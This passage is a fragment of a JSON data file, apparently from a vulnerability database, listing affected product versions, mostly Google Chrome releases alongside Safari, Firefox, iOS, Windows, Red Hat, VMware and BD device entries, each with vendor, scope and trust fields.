"eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.632.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.158" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.328" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.5" }, { "model": "simatic et 200sp open controller", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.899.0" }, { "model": "windows for x64-based systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1029" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.571.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.30" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.79" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1016070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1677.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.19" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.734.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1310.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "pyxis transfusion verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.131.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.512" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.35" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.485.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.678.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.16" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.372.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.949.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "23.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.392.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "32" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.212" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1063" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.710.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.206" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.620.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.568.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.735.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "50.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.487.0" }, { "model": "workstation", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "12.5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.129" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.590.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.113" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.23" }, { "model": "carrier routing system 6.6.0.base", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.332.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.953.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1071.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1013.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.73" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.113" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.340.0" }, { "model": "facsaria fusion", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.373.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.87" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "49.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.0" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.353.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.43" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.470.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.461.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "22.04917" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.446.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.1" }, { "model": "enterprise linux for power big endian extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.357.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.459.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.541.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.221" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.333.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.779.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.307" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.127" }, { "model": "chrome beta mac", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1027" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.396.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.428.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1035.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "23.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.460.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.9" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.87" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "34.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1053" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.455.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1014.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "21.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.449.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.142" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.497.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.576.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1015.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.795.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.2" }, { "model": "vsphere integrated containers", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "1.3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.12" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.148" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.99" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.751.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.636.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.313" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.64" }, { "model": "windows for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.456.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.12" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.47" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.831.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.38" }, { "model": "innova", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.550.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.583.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.595.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1009" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.108" }, { "model": "proliant dl385 gen10 server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.94" }, { "model": "chrome", "scope": "eq", 